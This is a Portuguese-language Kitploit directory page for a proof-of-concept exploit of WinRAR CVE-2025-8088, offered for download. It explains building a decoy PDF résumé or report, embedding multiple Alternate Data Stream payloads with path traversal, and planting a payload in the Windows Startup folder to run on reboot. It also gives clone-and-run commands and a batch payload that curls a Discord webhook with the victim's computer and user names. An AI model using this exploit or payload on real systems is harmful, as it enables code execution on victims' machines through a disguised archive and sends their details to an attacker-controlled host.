Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
best-CVE-2025-8088 — Exploração de CVE no Winrar anterior à versão 7.13 usando múltiplos fluxos ADS em um único arquivo (Implementação de PDF personalizada) | Kitploit
Ferramentas/GitHubGitHub/pentestfunctions/best-cve-2025-8088
Análise de VulnerabilidadesExploraçãoPós-ExploraçãoTestes de PenetraçãoRed TeamingDesenvolvimento de PayloadsExploração de Binários
GitHubpentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

Exploração de CVE no Winrar anterior à versão 7.13 usando múltiplos fluxos ADS em um único arquivo (Implementação de PDF personalizada)

Ver Repositório
113há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8088 Exploit do WinRAR 🔓

Um exploit de prova de conceito para a vulnerabilidade do WinRAR (CVE-2025-8088) que afeta as versões 7.12 e anteriores. Esta ferramenta cria um arquivo RAR malicioso que incorpora payloads em Alternate Data Streams (ADS) com path traversal, potencialmente levando à execução arbitrária de código.

  • O problema com muitos outros é que eles não incorporam múltiplos streams ADS, exigindo sorte para ter o path traversal correto ou saber o nome de usuário/diretório de extração exatos.

🚀 Como Funciona

  1. Cria um Documento Isca 📄 - Gera um PDF de aparência profissional (currículo ou relatório de pentest)
  2. Incorpora Múltiplos Streams ADS 🔄 - Anexa streams de payload com diferentes profundidades de path traversal
  3. Manipula Cabeçalhos RAR ⚙️ - Modifica a estrutura do arquivo para explorar a vulnerabilidade de path traversal
  4. Insere Payload na Inicialização 📂 - Tenta escrever o payload na pasta de inicialização do Windows quando extraído

🛠️ Uso

root@kitploit:~
# Clone o repositório
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Instale as dependências
pip install reportlab

# Execute o exploit
python CVE-2025-8088.py

✏️ Personalização do Payload

Edite o payload para chamar um webhook do Discord:

root@kitploit:~
# Substitua a variável PAYLOAD no script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extraído em %COMPUTERNAME% por %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Substitua YOUR_DISCORD_WEBHOOK_URL pela URL real do seu webhook.

🔄 Fluxo de Execução

  1. A vítima extrai o RAR com WinRAR vulnerável (≤7.12)
  2. O payload é escrito na pasta de inicialização:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Na próxima reinicialização ➡️ o payload é executado automaticamente

📋 Requisitos

  • Sistema Operacional Windows 🪟
  • Python 3.x 🐍
  • WinRAR instalado
  • Biblioteca ReportLab (pip install reportlab)
Baixar ferramenta